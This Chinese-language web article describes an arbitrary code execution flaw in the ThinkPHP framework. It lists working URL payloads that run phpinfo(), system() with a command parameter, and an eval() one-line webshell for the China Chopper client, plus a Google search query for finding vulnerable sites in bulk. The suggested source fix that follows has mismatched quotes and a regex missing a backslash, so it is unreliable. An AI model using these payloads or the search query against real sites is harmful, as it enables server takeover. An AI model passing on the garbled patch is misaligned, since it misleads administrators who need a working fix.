程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> PHP綜合 >> ThinkPHP框架任意代碼執行漏洞的利用及其修復方法

ThinkPHP框架任意代碼執行漏洞的利用及其修復方法

編輯:PHP綜合

ThinkPHP是國內著名的開源的PHP框架,是為了簡化企業級應用開發和敏捷WEB應用開發而誕生的。最早誕生於2006年初,原名FCS,2007年元旦正式更名為ThinkPHP,並且遵循Apache2開源協議發布。早期的思想架構來源於Struts,後來經過不斷改進和完善,同時也借鑒了國外很多優秀的框架和模式,使用面向對象的開發結 構和MVC模式,融合了Struts的Action和Dao思想和JSP的TagLib(標簽庫)、RoR的ORM映射和ActiveRecord模式, 封裝了CURD和一些常用操作,單一入口模式等,在模版引擎、緩存機制、認證機制和擴展性方面均有獨特的表現.
 
然而近期thinkphp框架爆出了一個任意代碼執行漏洞,其危害性相當的高,漏洞利用方法如下:
 

index.php/module/aciton/param1/${@print(THINK_VERSION)}
 
index.php/module/aciton/param1/${@function_all()}

其中的function_all代表任何函數,比如:

index.php/module/aciton/param1/${@phpinfo()}

就可以獲取服務器的系統配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

可以列出網站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}

就可以直接執行一句話代碼,用菜刀直接連接.

這樣黑客們就可以直接通過google批量搜索關鍵字:thinkphp intitle:系統發生錯誤 來獲取更多使用thinkphp框架的網站列表。可見其危害性相當的大。
 
thinkphp框架執行任意代碼漏洞修復方法:
 
用戶可下載官方發布的補丁:
 
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
 
或者或者直接修改源碼:

將/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

修改為:

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2';', implode($depr,$paths));

將preg_replace第二個參數中的雙引號改為單引號,防止其中的php變量語法被解析執行。
 
注:本文僅供學習參考使用,請不要用於非法用途。

更多關於thinkPHP相關內容感興趣的讀者可查看本站專題:《ThinkPHP入門教程》、《thinkPHP模板操作技巧總結》、《ThinkPHP常用方法總結》、《smarty模板入門基礎教程》及《PHP模板技術總結》。

希望本文所述對大家基於ThinkPHP框架的PHP程序設計有所幫助。

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved